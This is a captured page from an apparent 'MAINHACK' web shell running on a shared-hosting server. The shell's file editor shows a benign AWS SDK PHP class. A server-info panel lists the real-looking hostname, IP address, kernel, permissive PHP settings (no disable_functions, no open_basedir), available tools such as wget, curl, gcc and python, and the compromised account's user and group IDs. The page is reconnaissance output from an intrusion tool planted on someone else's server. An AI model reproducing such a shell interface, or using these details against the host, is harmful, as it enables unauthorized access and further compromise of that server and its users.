[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: EndpointDefinitionProvider.php
<?php namespace Aws\EndpointV2; /** * Provides Endpoint-related artifacts used for endpoint resolution * and testing. */ class EndpointDefinitionProvider { public static function getEndpointRuleset($service, $apiVersion, $baseDir = null) { return self::getData($service, $apiVersion, 'ruleset', $baseDir); } public static function getEndpointTests($service, $apiVersion, $baseDir = null) { return self::getData($service, $apiVersion, 'tests', $baseDir); } public static function getPartitions() { $basePath = __DIR__ . '/../data'; $file = '/partitions.json'; if (file_exists($basePath . $file . '.php')) { return require($basePath . $file . '.php'); } else { return json_decode(file_get_contents($basePath . $file)); } } private static function getData($service, $apiVersion, $type, $baseDir) { $basePath = $baseDir ? $baseDir : __DIR__ . '/../data'; $serviceDir = $basePath . "/{$service}"; if (!is_dir($serviceDir)) { throw new \InvalidArgumentException( 'Invalid service name.' ); } if ($apiVersion === 'latest') { $apiVersion = self::getLatest($service); } $rulesetPath = $serviceDir . '/' . $apiVersion; if (!is_dir($rulesetPath)) { throw new \InvalidArgumentException( 'Invalid api version.' ); } $fileName = $type === 'tests' ? '/endpoint-tests-1' : '/endpoint-rule-set-1'; if (file_exists($rulesetPath . $fileName . '.json.php')) { return require($rulesetPath . $fileName . '.json.php'); } elseif (file_exists($rulesetPath . $fileName . '.json')) { return json_decode(file_get_contents($rulesetPath . $fileName . '.json'), true); } else { throw new \InvalidArgumentException( 'Specified ' . $type . ' endpoint file for ' . $service . ' with api version ' . $apiVersion . ' does not exist.' ); } } private static function getLatest($service) { $manifest = \Aws\manifest(); return $manifest[$service]['versions']['latest']; } }
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: premium320.web-hosting.com
Server IP: 66.29.153.54
PHP Version: 8.2.29
Server Software: LiteSpeed
System: Linux premium320.web-hosting.com 4.18.0-553.50.1.lve.el8.x86_64 #1 SMP Thu Apr 17 19:10:24 UTC 2025 x86_64
HDD Total: 97.87 GB
HDD Free: 76.85 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
No
git:
Yes
User Info
Username: aoneqssk
User ID (UID): 1285
Group ID (GID): 1290
Script Owner UID: 1285
Current Dir Owner: 1285